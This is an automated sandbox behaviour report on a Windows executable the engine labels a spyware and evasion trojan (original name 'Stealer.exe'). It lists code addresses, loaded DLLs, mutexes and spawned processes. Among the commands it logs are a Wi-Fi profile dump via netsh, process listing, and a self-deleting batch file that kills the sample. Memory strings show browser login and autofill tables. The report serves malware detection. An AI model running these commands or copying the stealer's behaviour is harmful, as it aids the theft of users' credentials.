Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_07B31290	0_2_07B31290
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_07B3E100	0_2_07B3E100
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_07B31E18	0_2_07B31E18
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_07B32CB8	0_2_07B32CB8
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_07B3DCA8	0_2_07B3DCA8
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_07B3ECF0	0_2_07B3ECF0
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_07B3BB30	0_2_07B3BB30
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_07B31AD0	0_2_07B31AD0
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_07B3DA40	0_2_07B3DA40
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_07B3E700	0_2_07B3E700
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_07B394A0	0_2_07B394A0
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_07B394D8	0_2_07B394D8
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_07B3DDE2	0_2_07B3DDE2
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_07B3ECE1	0_2_07B3ECE1
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_07B3DA30	0_2_07B3DA30
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_080E0040	0_2_080E0040
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_080E9857	0_2_080E9857
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_080EE868	0_2_080EE868
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_080E1CA0	0_2_080E1CA0
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_080ED6DF	0_2_080ED6DF
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_080E6700	0_2_080E6700
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_080EE528	0_2_080EE528
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_080E2970	0_2_080E2970
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_080E8B8B	0_2_080E8B8B
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_080E9F88	0_2_080E9F88
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_080E0990	0_2_080E0990
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_080E41A0	0_2_080E41A0
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_080E64A8	0_2_080E64A8
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_080E98C8	0_2_080E98C8
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_080E0980	0_2_080E0980
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_080E5FEB	0_2_080E5FEB
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_080EBFE0	0_2_080EBFE0
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089C3098	0_2_089C3098
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089C3EC8	0_2_089C3EC8
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089C4CC8	0_2_089C4CC8
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089C6A08	0_2_089C6A08
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089C8006	0_2_089C8006
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089C3C48	0_2_089C3C48
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089C0040	0_2_089C0040
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089C7068	0_2_089C7068
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089C6660	0_2_089C6660
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089C4B98	0_2_089C4B98
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089C2798	0_2_089C2798
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089C2998	0_2_089C2998
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089C4489	0_2_089C4489
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089C4180	0_2_089C4180
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089C5CD0	0_2_089C5CD0
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089C001E	0_2_089C001E
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089C6650	0_2_089C6650
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089C4170	0_2_089C4170
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089C4768	0_2_089C4768
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089FC892	0_2_089FC892
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089FB888	0_2_089FB888
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089F7A00	0_2_089F7A00
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089FA658	0_2_089FA658
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089F0040	0_2_089F0040
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089FBB90	0_2_089FBB90
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089F4DC8	0_2_089F4DC8
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089F53F7	0_2_089F53F7
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089FB9EE	0_2_089FB9EE
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089F8B08	0_2_089F8B08
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089FBD07	0_2_089FBD07
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089FD520	0_2_089FD520
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089FC158	0_2_089FC158
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089FB2DE	0_2_089FB2DE
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089FAAF7	0_2_089FAAF7
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089FAEE9	0_2_089FAEE9
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089F72E0	0_2_089F72E0
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089F0006	0_2_089F0006
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089FC220	0_2_089FC220
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089F5260	0_2_089F5260
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089F6DCD	0_2_089F6DCD
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089F79F1	0_2_089F79F1
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089FD519	0_2_089FD519
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089F7160	0_2_089F7160
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_089FCF60	0_2_089FCF60

Source: C:\Users\user\Desktop\VaXmr82RIb.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3364 -s 3324

Source: VaXmr82RIb.exe, 00000000.00000002.30073132207.000000000186E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs VaXmr82RIb.exe
Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003687000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs VaXmr82RIb.exe
Source: VaXmr82RIb.exe, 00000000.00000000.29903268314.000000000109E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameStealer.exeJ vs VaXmr82RIb.exe
Source: VaXmr82RIb.exe	Binary or memory string: OriginalFilenameStealer.exeJ vs VaXmr82RIb.exe

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@25/18@2/2

Source: C:\Users\user\Desktop\VaXmr82RIb.exe

Code function: 0_2_080E0990 CreateToolhelp32Snapshot,

0_2_080E0990

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7264:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1972:304:WilStaging_02
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7264:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1972:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3364
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:304:WilStaging_02

Source: C:\Users\user\Desktop\VaXmr82RIb.exe

File created: C:\Users\user\AppData\Local\Temp\zc4g3vos.e4p

Jump to behavior

Source: C:\Users\user\Desktop\VaXmr82RIb.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpF01E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpF01E.tmp.bat

Source: VaXmr82RIb.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%

Source: C:\Users\user\Desktop\VaXmr82RIb.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, NumberOfCores, MaxClockSpeed FROM Win32_Processor
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 3364)

Source: C:\Users\user\Desktop\VaXmr82RIb.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\VaXmr82RIb.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004749000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004728000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007E7A000.00000004.00000020.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.00000000046C6000.00000004.00000800.00020000.00000000.sdmp, tmp7982.tmp.dat.0.dr, tmp7981.tmp.dat.0.dr, tmp7983.tmp.dat.0.dr	Binary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003724000.00000004.00000800.00020000.00000000.sdmp, tmp7980.tmp.dat.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004663000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004769000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.00000000046E6000.00000004.00000800.00020000.00000000.sdmp, tmp795D.tmp.dat.0.dr, tmp7960.tmp.dat.0.dr, tmp795F.tmp.dat.0.dr	Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;

Source: VaXmr82RIb.exe

ReversingLabs: Detection: 60%

Source: unknown	Process created: C:\Users\user\Desktop\VaXmr82RIb.exe "C:\Users\user\Desktop\VaXmr82RIb.exe"
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklist
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpF01E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpF01E.tmp.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 3364
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3364 -s 3324
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklist	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles \| findstr All	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpF01E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpF01E.tmp.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 3364	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak	Jump to behavior

Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
